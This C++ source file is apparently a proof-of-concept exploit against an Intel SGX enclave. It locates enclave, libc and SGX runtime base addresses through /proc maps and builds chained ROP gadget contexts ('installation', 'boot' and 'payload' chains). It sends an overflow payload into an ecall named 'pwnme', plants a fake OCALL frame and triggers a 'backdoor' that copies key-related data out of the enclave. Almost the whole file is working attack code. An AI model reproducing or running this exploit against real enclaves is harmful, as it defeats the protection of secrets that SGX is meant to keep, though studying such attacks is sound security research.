#include "sgx_urts.h"
#include "enclave_u.h"

#include "app/ExploitConstantAut.h"
#include "app/App.h"

#include "defs.h"

#include<iostream>
#include<unistd.h>
#include<pwd.h>

using namespace std;

typedef struct ms_ecall_pwnme_t {
	const char* ms_str;
	size_t ms_l;
} ms_ecall_pwnme_t;

extern "C" size_t sgx_gettcs(const sgx_enclave_id_t enclave_id, void** tcsList, size_t maxTcs);
void add(void*, unsigned long int, size_t*);

unsigned long baseAddr, contexec, glueGadget, bLibc, bLibSgxU;

unsigned long fakeFrame;
unsigned long workspaceBc, workspacePc, workspaceData;
unsigned long backupFF;
unsigned long backupFsBc, backupCtxBc, backupFsPc, backupCtxPc;
unsigned long backupFsBc1, backupCtxBc1, backupFsPc1, backupCtxPc1;
// unsigned long backupFsBc2, backupCtxBc2, backupFsPc2, backupCtxPc2;
unsigned long backupCo;

unsigned long buff[600];
unsigned long Oc[70] = {0};

/* Global EID shared by multiple threads */
sgx_enclave_id_t global_eid = 0;

unsigned long getEnclaveBaseAddress(void);
unsigned long getLibSgxUBaseAddress(void);
unsigned long getLibcBaseAddress(void);
void getStackInfo(void*,unsigned long*, unsigned long*);
size_t getTcs(void**, size_t);

void custom_ecall(uint64_t tcs, uint64_t apx, uint64_t sf, uint64_t ms);
void custom_oret(uint64_t tcs, uint64_t apx);
void initiateChain(sgx_exception_info_t*,unsigned long*,size_t);

#define LEN_FAKESTACK_IC 27
#define LEN_FAKESTACK_BC 3
#define LEN_FAKESTACK_PC 50
#define LEN_CONTEXTES_PC 9
#define LEN_FAKESTACK_BC1 3
#define LEN_FAKESTACK_PC1 15
#define R_SIZE (0x40)
#define XBUFFER_SIZE (0x400)
#define OCALLCTX_SIZE (0x100)

#define INIT_REGISTERS(mSp,mBp,mIp) __asm__ ( "mov %%rsp, %0\nmov %%rbp, %1\nlea (%%rip), %%rax\nmov %%rax, %2\n" : "=r"(mSp), "=r"(mBp), "=r"(mIp) : );

int main(int argc, char** argv) {

	sgx_launch_token_t token = {0};
  sgx_status_t ret = SGX_ERROR_UNEXPECTED;
  int updated;

	cout << "Enclave file: " << ENCLAVE_FILENAME << endl;
  ret = sgx_create_enclave(ENCLAVE_FILENAME, SGX_DEBUG_FLAG, &token, &updated, &global_eid, NULL);
  if (ret != SGX_SUCCESS) {
    cout << "Error enclave creation\nEnter a character before exit ..." << endl;
		cout << "Errocode: " << hex << ret << endl;
    getchar();
    return -1;
  }

	// FIRST PHASE: ANALYSIS OF THE ENCLAVE:
  baseAddr = getEnclaveBaseAddress();
  contexec = CONTINUE_EXECUTION + baseAddr;
  glueGadget = GLUE_GADGET + baseAddr;
  unsigned long movRspRbp = MOV_RSPRBP + baseAddr;

  printf("Enclave base address 0x%lx\n", baseAddr);

	unsigned long mSp, mBp, mIp;

  void* tcss2[20];
  size_t x2 = sgx_gettcs(global_eid, tcss2, 10);

  printf("x = %ld\n", x2);

  for (int i = 0; i < x2; i++)
    if (i%2 == 0)
      printf("tcs[%d] = %p - ", i, tcss2[i]);
    else
      printf("CThread[%d] = %p\n", i, tcss2[i]);

  void* tcss[10];

  size_t x = getTcs(tcss, sizeof(tcss)/sizeof(void*));
  for (int i = 0; i < x; i++)
    printf("tcs[%d] = %p\n", i, tcss[i]);

  unsigned long sStack, lStack;
  getStackInfo(tcss[0], &sStack, &lStack);
  //
  // unsigned long sStack1, lStack1;
  // getStackInfo(tcss[1], &sStack1, &lStack1);

  printf("\n");
  printf("Info for TCS: 0x%lx\n", (unsigned long)tcss[0]);
  printf("Stack starts at address 0x%lx\n", sStack);
  printf("Stack's size is 0x%lx\n", lStack);
  printf("\n");
  // printf("Info for TCS: 0x%lx\n", (unsigned long)tcss[1]);
  // printf("Stack starts at address 0x%lx\n", sStack1);
  // printf("Stack's size is 0x%lx\n", lStack1);
  // printf("\n");

  bLibSgxU = getLibSgxUBaseAddress();
  printf("libsgx_urts.so base address 0x%lx\n", bLibSgxU);

  bLibc = getLibcBaseAddress();
  printf("libc.so base address 0x%lx\n", bLibc);

  printf("----------------------------------\n");
	__attribute__((aligned(64))) uint64_t stuff[(R_SIZE + XBUFFER_SIZE + OCALLCTX_SIZE)/sizeof(uint64_t)];
	// void *xsave_buffer = (void*)stuff;
	// uint64_t *r = stuff + XBUFFER_SIZE/sizeof(uint64_t);
	// ocall_context_t *myContext = (ocall_context_t*)(stuff + (R_SIZE + XBUFFER_SIZE)/sizeof(uint64_t));
	// *r = 0xdeadb00f;
	// *(r+1) = (uint64_t)movRspRbp;
	ocall_context_t *myContext = (ocall_context_t*)stuff;
	void *xsave_buffer = (void*)(stuff + OCALLCTX_SIZE/sizeof(uint64_t));
	uint64_t *r = stuff + (OCALLCTX_SIZE + XBUFFER_SIZE)/sizeof(uint64_t);
	*r = 0xdeadb00f;
	*(r+1) = (uint64_t)movRspRbp;

	// INSTALLATION CHAIN!! (Ic)
	unsigned long fakeStackIc[LEN_FAKESTACK_IC] = {0};
	unsigned long padding1[0x600] = {0}; // it must stay here!
	sgx_exception_info_t ctxIc[(LEN_FAKESTACK_IC/3) + 1] = {0};

	// PAYLOAD CHAIN!! (Pc)
	unsigned long fakeStackPc[LEN_FAKESTACK_PC] = {0};
	sgx_exception_info_t ctxPc[LEN_CONTEXTES_PC] = {0};

	// BOOT CHAIN!! (Bc)
	unsigned long fakeStackBc[LEN_FAKESTACK_BC] = {0};
	sgx_exception_info_t ctxBc[(LEN_FAKESTACK_BC/3)] = {0};

	// PAYLOAD CHAIN!! (Pc1)
	unsigned long fakeStackPc1[LEN_FAKESTACK_PC1] = {0};
	sgx_exception_info_t ctxPc1[(LEN_FAKESTACK_PC1/3) + 1] = {0};

	// BOOT CHAIN!! (Bc1)
	unsigned long fakeStackBc1[LEN_FAKESTACK_BC1] = {0};
	sgx_exception_info_t ctxBc1[(LEN_FAKESTACK_BC1/3)] = {0};

	// POINTERS
	// my frame should start from here
	// fakeFrame = sStack - FAKE_FRAME_DISTANCE;
	fakeFrame = sStack - FAKE_FRAME_DISTANCE;
	// worspaces
	workspaceBc = sStack - WORKSPACE_DISTANCE;
	workspaceData = workspaceBc + 0x1000;

	workspacePc = sStack - WORKSPACE_DISTANCE;
	// backup pointers:
	backupFF = sStack - BACKUP_DISTANCE;
	backupFsBc = backupFF + 0x1000;
	backupCtxBc = backupFF + 0x1100;
	backupFsPc = backupFF + 0x1300;
	backupCtxPc = backupFF + 0x1500;

	backupFsBc1 = backupFF + 0x2500;
	backupCtxBc1 = backupFF + 0x2600;
	backupFsPc1 = backupFF + 0x2800;
	backupCtxPc1 =  backupFF + 0x3000;

	backupCo = backupFF + 0x6000;

	r[0] = workspaceBc - 0x8;

	// set structures for fakeframe
	myContext->ocall_depth = 1;
	// myContext->ocall_ret = (uintptr_t)(fakeFrame + ((uint64_t)xsave_buffer - (uint64_t)myContext));
	myContext->ocall_ret = (uintptr_t)(fakeFrame + OCALLCTX_SIZE);
	// myContext->xbp = (uintptr_t)(fakeFrame + ((uint64_t)r - (uint64_t)myContext));
	myContext->xbp = (uintptr_t)(fakeFrame + XBUFFER_SIZE + OCALLCTX_SIZE);
	myContext->ocall_index = 0;
	myContext->ocall_flag = OCALL_FLAG;
	myContext->pre_last_sp = sStack-0x200; // test for previous stack

	// PAYLOAD CHAIN

	// pivot to if-chain
	// rdi = &old-AES + 0x68
	ctxPc[0].cpu_context.rdi = workspaceData-0x68;
	// rax = &P_KEY
	ctxPc[0].cpu_context.rax = P_KEY + baseAddr;
	// rdx = offset
	ctxPc[0].cpu_context.rdx = 252;
	// rcx = &true-chain
	ctxPc[0].cpu_context.rcx = 0x10; // &true-chain
	ctxPc[0].cpu_context.rip = G1 + baseAddr;
	ctxPc[0].cpu_context.rsp = workspacePc + 3 * sizeof(unsigned long);

	// ctxPc[1].cpu_context.rcx = ELEMENTS + baseAddr;
	ctxPc[1].cpu_context.rip = workspacePc + 3 * sizeof(unsigned long);
	ctxPc[1].cpu_context.rsp = workspacePc + 6 * sizeof(unsigned long);

	// context  for true
	// memcpy(workspaceData, buff)
	// ctxPc[2].cpu_context.rsi = ELEMENTS + baseAddr;
	ctxPc[2].cpu_context.rdi = (unsigned long)buff;
	ctxPc[2].cpu_context.rdx = 252; // (PASS_LEN x MAX_ELEMENT) + sizeof(int)
	ctxPc[2].cpu_context.rsp = workspacePc + (18 + 0x80/sizeof(unsigned long)) * sizeof(unsigned long);
	ctxPc[2].cpu_context.rip = MEMCPY + baseAddr;


	// if context
	fakeStackPc[0] = glueGadget;
	fakeStackPc[1] = backupCtxPc;
	fakeStackPc[2] = contexec;

	// add if-chain here
	// fakeStackPc[3] = G1 + baseAddr;
	fakeStackPc[3] = G2 + baseAddr;
	fakeStackPc[4] = G3 + baseAddr;
	fakeStackPc[5] = G4 + baseAddr;
	fakeStackPc[6] = G5 + baseAddr;
	fakeStackPc[7] = G6 + baseAddr;
	fakeStackPc[8] = G7 + baseAddr;

	// frame true
	fakeStackPc[9] = 0xdeadb000;
	fakeStackPc[10] = 0x2;
	fakeStackPc[11] = 0x3;
	fakeStackPc[12] = glueGadget;

	// spray around
	for (unsigned long x = 13; x < 15+0x80/sizeof(unsigned long); x++)
		fakeStackPc[x] = x + 0x4;

	fakeStackPc[13+0x80/sizeof(unsigned long)] = 0xdeadb001;
	fakeStackPc[13+0x80/sizeof(unsigned long)] = backupCtxPc + 2 * sizeof(sgx_exception_info_t);
	fakeStackPc[14+0x80/sizeof(unsigned long)] = contexec;

	// memcpy(Pc, workspace1)
	ctxBc[0].cpu_context.rdi = workspacePc;
	ctxBc[0].cpu_context.rdx = sizeof(fakeStackPc);
	ctxBc[0].cpu_context.rsi = backupFsPc;
	ctxBc[0].cpu_context.rip = MEMCPY + baseAddr;
	ctxBc[0].cpu_context.rsp = workspacePc;

	fakeStackBc[0] = glueGadget;
	fakeStackBc[1] = backupCtxBc;
	fakeStackBc[2] = contexec;

	// INSTALLATION CHAIN

  // memcpy(fakeframe, backup)
  ctxIc[0].cpu_context.rdi = backupFF;
  // ctxIc[0].cpu_context.rdx = (unsigned long)&BOTTOM_FF - (unsigned long)myContext;
  ctxIc[0].cpu_context.rdx = sizeof(stuff);
  // ctxIc[0].cpu_context.rsi = (unsigned long)myContext;
  ctxIc[0].cpu_context.rsi = (unsigned long)stuff;
  ctxIc[0].cpu_context.rsp = (unsigned long)fakeStackIc;
  ctxIc[0].cpu_context.rip = MEMCPY + baseAddr;

  // memcpy(CtxBc, backupCtxBc)
  ctxIc[1].cpu_context.rdi = backupCtxBc;
  ctxIc[1].cpu_context.rdx = sizeof(ctxBc);
  ctxIc[1].cpu_context.rsi = (unsigned long)ctxBc;
  ctxIc[1].cpu_context.rip = MEMCPY + baseAddr;

  // memcpy(FsBc, backupFsBc)
  ctxIc[2].cpu_context.rdi = backupFsBc;
  ctxIc[2].cpu_context.rdx = sizeof(fakeStackBc);
  ctxIc[2].cpu_context.rsi = (unsigned long)fakeStackBc;
  ctxIc[2].cpu_context.rip = MEMCPY + baseAddr;

  // memcpy(CtxPc, backupCtxPc)
  ctxIc[3].cpu_context.rdi = backupCtxPc;
  ctxIc[3].cpu_context.rdx = sizeof(ctxPc);
  ctxIc[3].cpu_context.rsi = (unsigned long)ctxPc;
  ctxIc[3].cpu_context.rip = MEMCPY + baseAddr;

  // memcpy(FsPc, backupFsPc)
  ctxIc[4].cpu_context.rdi = backupFsPc;
  ctxIc[4].cpu_context.rdx = sizeof(fakeStackPc);
  ctxIc[4].cpu_context.rsi = (unsigned long)fakeStackPc;
  ctxIc[4].cpu_context.rip = MEMCPY + baseAddr;

  // // memcpy(CtxBc1, backupCtxBc1)
  // ctxIc[5].cpu_context.rdi = backupCtxBc1;
  // ctxIc[5].cpu_context.rdx = sizeof(ctxBc1);
  // ctxIc[5].cpu_context.rsi = (unsigned long)ctxBc1;
  // ctxIc[5].cpu_context.rip = MEMCPY + baseAddr;
  //
  // // memcpy(FsBc1, backupFsBc1)
  // ctxIc[6].cpu_context.rdi = backupFsBc1;
  // ctxIc[6].cpu_context.rdx = sizeof(fakeStackBc1);
  // ctxIc[6].cpu_context.rsi = (unsigned long)fakeStackBc1;
  // ctxIc[6].cpu_context.rip = MEMCPY + baseAddr;
  //
  // // memcpy(CtxPc1, backupCtxPc1)
  // ctxIc[7].cpu_context.rdi = backupCtxPc1;
  // ctxIc[7].cpu_context.rdx = sizeof(ctxPc1);
  // ctxIc[7].cpu_context.rsi = (unsigned long)ctxPc1;
  // ctxIc[7].cpu_context.rip = MEMCPY + baseAddr;
  //
  // // memcpy(FsPc1, backupFsPc1)
  // ctxIc[8].cpu_context.rdi = backupFsPc1;
  // ctxIc[8].cpu_context.rdx = sizeof(fakeStackPc1);
  // ctxIc[8].cpu_context.rsi = (unsigned long)fakeStackPc1;
  // ctxIc[8].cpu_context.rip = MEMCPY + baseAddr;

  // memcpy(FsBc, workspaceBc)
  ctxIc[5].cpu_context.rdi = workspaceBc;
  ctxIc[5].cpu_context.rdx = sizeof(fakeStackBc);
  ctxIc[5].cpu_context.rsi = (unsigned long)fakeStackBc;
  ctxIc[5].cpu_context.rip = MEMCPY + baseAddr;

  // memcpy(fakeframe, enclave)
  ctxIc[6].cpu_context.rdi = fakeFrame;
  // ctxIc[6].cpu_context.rdx = (unsigned long)&BOTTOM_FF - (unsigned long)myContext;
  ctxIc[6].cpu_context.rdx = sizeof(stuff);
  // ctxIc[6].cpu_context.rsi = (unsigned long)myContext;
  ctxIc[6].cpu_context.rsi = (unsigned long)stuff;
  ctxIc[6].cpu_context.rip = MEMCPY + baseAddr;

  // save_xregs(xsave_buffer)
  // ctxIc[7].cpu_context.rdi = fakeFrame + ((unsigned long)xsave_buffer - (unsigned long)myContext);
  ctxIc[7].cpu_context.rdi = fakeFrame + OCALLCTX_SIZE;
  ctxIc[7].cpu_context.rip = SAVE_XREGS + baseAddr;

  // update_ocall_lastsp(fakeFrame)
  ctxIc[8].cpu_context.rdi = fakeFrame;
  ctxIc[8].cpu_context.rip = UPDATE_OCALL_LASTSP + baseAddr;

  // // addevent(0, &triggerExc)
  // ctxIc[9].cpu_context.rdi = 0;
  // ctxIc[9].cpu_context.rsi = (unsigned long)&triggerExc;
  // // ctxIc[14].cpu_context.rip = ADD_EVENT + baseAddr;

  INIT_REGISTERS(mSp, mBp, mIp)
  ctxIc[9].cpu_context.rax = EEXIT;
  ctxIc[9].cpu_context.rsp = mSp;
  ctxIc[9].cpu_context.rbp = mBp;
  // NOTE: this is an HARDCODE offest, to recompute at any compilation!!
  ctxIc[9].cpu_context.rbx = mIp + RIP_DELTA_IC;
  ctxIc[9].cpu_context.rip = ENCLU_TRTS + baseAddr;

  initiateChain(ctxIc, fakeStackIc, LEN_FAKESTACK_IC);

  // uint64_t apx = ENCLU_URTS + bLibSgxU;
  uint64_t apx = bLibSgxU + UMORESTACK + 0x105;

	// EXPLOIT CHAIN!!
  uint8_t exploit[500] = {0};
  size_t len = 0;
	// padding
  for (len = 0; len < 0x78; len++)
    exploit[len] = 'A';
  // add(&exploit[len], 0xdead00fdeadb00f, &len);
  // 0x0000000000000f40 : pop rdi ; ret
  add(&exploit[len], POP_RDI + baseAddr, &len);
  // &ctx0
  add(&exploit[len], (unsigned long)&ctxIc[0], &len);
  // &continue_execution
  add(&exploit[len], contexec, &len);

	int resp_enclave;
	uint8_t* sealed_key_b = new uint8_t[SEALED_KEY_LENGTH];
	ret = generateKeyEnclave(global_eid, &resp_enclave, sealed_key_b, SEALED_KEY_LENGTH);
	if (ret != SGX_SUCCESS)
			return ret;

	ret = loadKeyEnclave(global_eid, &resp_enclave, sealed_key_b, SEALED_KEY_LENGTH);
	if (ret != SGX_SUCCESS)
			return ret;

	delete[] sealed_key_b;

	// INSTALLATION PHASE!
	ms_ecall_pwnme_t ms;
  ms.ms_str = (const char*)exploit;
  ms.ms_l = len;
  custom_ecall((uint64_t)tcss[0], apx, 0, (uint64_t)&ms);

	ret = generateKeyEnclave(global_eid, &resp_enclave, sealed_key_b, SEALED_KEY_LENGTH);
	if (ret != SGX_SUCCESS)
			return ret;

	// TRIGGER BACKDOOR
	custom_oret((uint64_t)tcss[0], apx);

	return 0;
}

void custom_ecall(uint64_t tcs, uint64_t apx, uint64_t sf, uint64_t ms) {
  uint64_t eenter = EENTER;

  __asm__ (
    "mov %0, %%rax\n"
    "mov %1, %%rbx\n"
    "mov %2, %%rdi\n"
    "mov %3, %%rcx\n"
    "mov %4, %%rsi\n"
    "enclu\n"
    : // no output
    : "r"(eenter), "r"(tcs), "r"(sf) , "r"(apx), "r"(ms)
    : "rax", "rbx", "rdi", "rcx", "rsi"
  );
}

void custom_oret(uint64_t tcs, uint64_t apx) {

    uint64_t eenter = EENTER;
    uint64_t oret = -2;

    __asm__ (
      "mov %0, %%rax\n"
      "mov %1, %%rbx\n"
      "mov %2, %%rdi\n"
      "mov %3, %%rcx\n"
      "enclu\n"
      : // no output
      : "r"(eenter), "r"(tcs), "r"(oret) , "r"(apx)
    );

}

unsigned long getEnclaveBaseAddress() {
  FILE * fp;
  char * line = NULL;
  size_t len = 100;
  ssize_t read;

  line = (char*)malloc(len);

  pid_t p = getpid();

  char fPath[100] = { 0 };
  //printf("PID = %d\n", p);

  snprintf(fPath, 100, "/proc/%d/maps", p);

  //printf("map file: %s\n", fPath);

  fp = fopen(fPath, "r");
  if (fp == NULL) {
      printf("fail opening: %s\n", fPath);
      free(line);
      exit(EXIT_FAILURE);
  }

  bool atLeastOne = false;
  while ((read = getline(&line, &len, fp)) != -1) {
    if(strstr(line, "isgx") != NULL) {
      atLeastOne = true;
      break;
    }
  }

  fclose(fp);

  if (atLeastOne) {
    // I extract basic address
    printf("There is at least an enclave\n");
    //printf("isgx: %s\n", line);

    char* pEnd = strstr(line, "-");

    char strBaseAddr[17] = { 0 };

    memcpy(strBaseAddr, line, pEnd-line);
    strBaseAddr[17] = {0};

    //printf("Estimaqted base addr: 0x%s\n", strBaseAddr);

    unsigned long baseAddr = (unsigned long)strtol(strBaseAddr, NULL, 16);

    free(line);

    return baseAddr;
  }
  else {
    printf("I didn't find any enclave!\n");
    free(line);
    exit(EXIT_FAILURE);
  }

  free(line);
  exit(EXIT_SUCCESS);
}

size_t getTcs(void** tcs, size_t l) {
  FILE * fp;
  ssize_t read;

  size_t len = 100;
  char *line;
  line = (char*)malloc(len);

  pid_t p = getpid();

  char fPath[100] = { 0 };
  //printf("PID = %d\n", p);

  snprintf(fPath, sizeof(fPath), "/proc/%d/maps", p);

  //printf("map file: %s\n", fPath);

  fp = fopen(fPath, "r");
  if (fp == NULL) {
      printf("fail opening: %s\n", fPath);
      free(line);
      exit(EXIT_FAILURE);
  }

  int i = 0;

  // OK: 0x3000 => 7fc247457000-7fc24745a000 rw-s 00457000 00:06 455 /dev/isgx
  while ((read = getline(&line, &len, fp)) != -1) {
    // char *l = line;
    if(strstr(line, "isgx") != NULL && strstr(line, "rw-s") != NULL) {
      // printf("%s", line);
      // printf("This line has a isgx and it is a possible stack.\n");

      // check if the block is 0x3000 long
      char* pEnd = strstr(line, " r");
      char* pStart = strstr(line, "-");

      if (pEnd == NULL || pStart == NULL) {
        printf("The line is broken, kill all!\n");
        free(line);
        exit(1);
      }

      // printf("start pos: %ld\n", pStart-line);
      // printf("end pos: %ld\n", pEnd-line);

      char startAddr[13];
      char endAddr[13];
      memcpy(startAddr, line, pStart-line);
      memcpy(endAddr, pStart+1, pEnd-line);
      startAddr[12] = {0};
      endAddr[12] = {0};
      // printf("-> start address: 0x%s\n", startAddr);
      // printf("-> end address: 0x%s\n", endAddr);
      uint64_t strt = (unsigned long)strtol(startAddr, NULL, 16);
      uint64_t end = (unsigned long)strtol(endAddr, NULL, 16);
      uint64_t delta = end-strt;
      if (delta == 0x3000) {
        // printf("-> this is a TCS: 0x%s\n", startAddr);
        tcs[i] =  (void*)strt;
        i++;
        if (i > l) {
          free(line);
          printf("Too many TCS!\n");
          exit(1);
        }
      }
    }
  }

  // printf("Exit for backup\n");
  fclose(fp);
  free(line);
  // exit(EXIT_SUCCESS);

  return i;
}

void getStackInfo(void* tcs, unsigned long* sStack, unsigned long* lStack) {
  FILE * fp;
  char* line[4] = {0};
  size_t len[4];
  ssize_t read;



  pid_t p = getpid();

  char fPath[100] = { 0 };
  //printf("PID = %d\n", p);

  snprintf(fPath, sizeof(fPath), "/proc/%d/maps", p);

  //printf("map file: %s\n", fPath);

  fp = fopen(fPath, "r");
  if (fp == NULL) {
      printf("fail opening: %s\n", fPath);
      exit(EXIT_FAILURE);
  }

  bool atLeastOne = false;
  int i = 0, j = -1;
  while ((read = getline(&line[i%4], &len[i%4], fp)) != -1) {
    //printf("%s\n", line[i%3]);
    // don't know why but I need this temp variable...
    char *l = line[i%4];
    if(strstr(l, "isgx") != NULL) {
      //printf("This line has a isgx\n");
      char* pEnd = strstr(l, "-");
      char strAddr[17] = { 0 };
      memcpy(strAddr, l, pEnd-l);
      strAddr[17] = {0};
      //printf("-> got an address: 0x%s\n", strAddr);
      unsigned long addr = (unsigned long)strtol(strAddr, NULL, 16);
      if (addr == (unsigned long)tcs) {
        j = i % 4;
        //printf("-> got it, let's read the stack\n");
        break;
      }
    }
    i++;
  }
  //printf("Last j = %d\n", j);
  int d = abs(j+1);
  //printf("Last d = %d\n", d);
  //printf("Original\n");
  //for(int i = 0; i < 4; i++) {
  //  printf("[%d] => %s\n", i, line[i]);
  //}
  //printf("Ordered\n");
  unsigned long a, b;
  for(int i = 0; i < 4; i++) {
    int k = (i + d) % 4;
    //printf("[%d] => %s\n", i, line[k]);
    char *l = line[k];

    // I just need the first 2 "ordered" lines
    if (i == 0) {
      char* pEnd = strstr(l, "-");
      char strAddr[17] = { 0 };
      memcpy(strAddr, l, pEnd-l);
      strAddr[17] = {0};
      a = (unsigned long)strtol(strAddr, NULL, 16);
    }
    if (i == 1) {
      char* pEnd = strstr(l, " r");
      char* pStart = strstr(l, "-");
      char strAddr[17] = { 0 };
      memcpy(strAddr, pStart+1, pEnd-l);
      strAddr[17] = {0};
      b = (unsigned long)strtol(strAddr, NULL, 16);
      break;
    }

  }

  *sStack = b;
  *lStack = b-a;

  //printf("a = %lx\n", a);
  //printf("b = %lx\n", b);
  //printf("stack size = 0x%lx\n", (b-a));

  //printf("Exit for backup\n");
  fclose(fp);
  //exit(EXIT_SUCCESS);
}

unsigned long getLibcBaseAddress() {
  FILE * fp;
  char * line = NULL;
  size_t len = 0;
  ssize_t read;

  pid_t p = getpid();

  char fPath[100] = { 0 };
  //printf("PID = %d\n", p);

  snprintf(fPath, 100, "/proc/%d/maps", p);

  //printf("map file: %s\n", fPath);

  fp = fopen(fPath, "r");
  if (fp == NULL) {
      printf("fail opening: %s\n", fPath);
      exit(EXIT_FAILURE);
  }

  bool atLeastOne = false;
  while ((read = getline(&line, &len, fp)) != -1) {
    if(strstr(line, "libc-") != NULL) {
      atLeastOne = true;
      break;
    }
  }

  fclose(fp);

  if (atLeastOne) {
    // I extract basic address
    printf("Found libc.so\n");
    //printf("isgx: %s\n", line);

    char* pEnd = strstr(line, "-");

    char strBaseAddr[17] = { 0 };

    memcpy(strBaseAddr, line, pEnd-line);
    strBaseAddr[17] = {0};

    //printf("Estimated base addr: 0x%s\n", strBaseAddr);

    unsigned long baseAddr = (unsigned long)strtol(strBaseAddr, NULL, 16);

    free(line);

    return baseAddr;
  }
  else {
    printf("I didn't find any libc.so!\n");
    exit(EXIT_FAILURE);
  }

  exit(EXIT_SUCCESS);
}

unsigned long getLibSgxUBaseAddress() {
  FILE * fp;
  char * line = NULL;
  size_t len = 0;
  ssize_t read;

  pid_t p = getpid();

  char fPath[100] = { 0 };
  //printf("PID = %d\n", p);

  snprintf(fPath, 100, "/proc/%d/maps", p);

  //printf("map file: %s\n", fPath);

  fp = fopen(fPath, "r");
  if (fp == NULL) {
      printf("fail opening: %s\n", fPath);
      exit(EXIT_FAILURE);
  }

  bool atLeastOne = false;
  while ((read = getline(&line, &len, fp)) != -1) {
    if(strstr(line, "libsgx_urts.so") != NULL) {
      atLeastOne = true;
      break;
    }
  }

  fclose(fp);

  if (atLeastOne) {
    // I extract basic address
    printf("Found libsgx_urts.so\n");
    //printf("isgx: %s\n", line);

    char* pEnd = strstr(line, "-");

    char strBaseAddr[17] = { 0 };

    memcpy(strBaseAddr, line, pEnd-line);
    strBaseAddr[17] = {0};

    //printf("Estimated base addr: 0x%s\n", strBaseAddr);

    unsigned long baseAddr = (unsigned long)strtol(strBaseAddr, NULL, 16);

    free(line);

    return baseAddr;
  }
  else {
    printf("I didn't find any libsgx_urts.so!\n");
    exit(EXIT_FAILURE);
  }

  exit(EXIT_SUCCESS);
}

void initiateChain(sgx_exception_info_t *ctx, unsigned long *fakeStack, size_t stackLen) {
  int nContext;
  for (int i = 0; i < stackLen; i++) {

    nContext = (i/3)+1;
    // first the glue
    if (i % 3 == 0) {
      fakeStack[i] = (unsigned long)glueGadget;
    }
    // second the next context
    if (i % 3 == 1) {
      fakeStack[i] = (unsigned long)&ctx[nContext];
      //ctx[nContext].cpu_context.rip = (unsigned long)gadget[nContext];
      if (nContext < stackLen/3)
        ctx[nContext].cpu_context.rsp = (unsigned long)&fakeStack[i + 2];
    }
    // third the continue_execution
    if (i % 3 == 2) {
      fakeStack[i] = (unsigned long)contexec;
    }

  }
}

void add(void * d, unsigned long int x, size_t *s) {
  memcpy(d, &x, 8);
  if (s)
    *s += sizeof(unsigned long int);
}
